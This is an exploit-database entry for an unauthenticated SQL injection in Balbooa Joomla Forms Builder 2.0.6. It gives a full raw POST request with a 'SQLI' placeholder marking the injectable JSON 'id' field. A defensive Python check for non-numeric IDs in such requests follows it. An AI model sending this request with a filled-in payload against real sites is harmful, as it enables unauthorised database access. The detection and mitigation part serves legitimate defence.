## https://sploitus.com/exploit?id=PACKETSTORM:164610
# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)  
# Date: 24.10.2021  
# Exploit Author: blockomat2100  
# Vendor Homepage: https://www.balbooa.com/  
# Version: 2.0.6  
# Tested on: Docker  
  
An example request that triggers the SQL injection; the "SQLI" placeholder in the "id" value of the JSON field marks the injected parameter:  
  
POST /index.php?option=com_baforms HTTP/1.1  
Host: localhost  
Content-Length: 862  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035  
Connection: close  
  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="1"  
  
{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="form-id"  
  
1  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="task"  
  
form.message  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="submit-btn"  
  
2  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-title"  
  
Home  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-url"  
  
http://localhost/  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-id"  
  
0  
------WebKitFormBoundaryTAak6w3vHUykgInT--
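
A defensive check for this request shape, added here as an example (it is not part of the original advisory or the vendor's code): it parses the multipart body and flags non-numeric ID values in the JSON descriptor of a form.message post. Treating "id" as numeric is an assumption, and the function names and the ExampleBoundary sample body are constructed for illustration.

```python
import json
from email.parser import BytesParser

# Numeric in the request above; treating "id" as numeric is this example's assumption.
NUMERIC_KEYS = ("submission_id", "form_id", "field_id", "id")
CTYPE = "multipart/form-data; boundary=----ExampleBoundary"  # constructed sample

def parse_multipart(content_type, body):
    """Return {field name: text value} for a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser().parsebytes(raw)
    fields = {}
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        fields[name] = data.decode("utf-8", "replace").strip()
    return fields

def is_int_like(value):
    """True for ints and ASCII digit strings (bool is excluded on purpose)."""
    if isinstance(value, bool):
        return False
    return isinstance(value, int) or (
        isinstance(value, str) and value.isascii() and value.isdigit())

def find_bad_ids(content_type, body):
    """List (field, key, value) for non-numeric IDs in a form.message post."""
    fields = parse_multipart(content_type, body)
    if fields.get("task") != "form.message":
        return []
    findings = []
    for name, text in fields.items():
        try:
            doc = json.loads(text)
        except ValueError:
            continue  # plain form values such as "Home" are not JSON
        entries = doc.values() if isinstance(doc, dict) else []
        for entry in (e for e in entries if isinstance(e, dict)):
            for key in NUMERIC_KEYS:
                if key in entry and not is_int_like(entry[key]):
                    findings.append((name, key, entry[key]))
    return findings

def sample_body(id_value):
    """Constructed body with the field names of the request above."""
    desc = {"1": {"submission_id": 0, "form_id": 1, "field_id": 1, "id": id_value}}
    fields = {"1": json.dumps(desc), "form-id": "1", "task": "form.message"}
    parts = ['------ExampleBoundary\r\nContent-Disposition: form-data; '
             f'name="{k}"\r\n\r\n{v}\r\n' for k, v in fields.items()]
    return ("".join(parts) + "------ExampleBoundary--\r\n").encode()
```

The same allow-list idea applies on the server side: casting the ID to an integer and binding it as a query parameter removes the injection point instead of only detecting it.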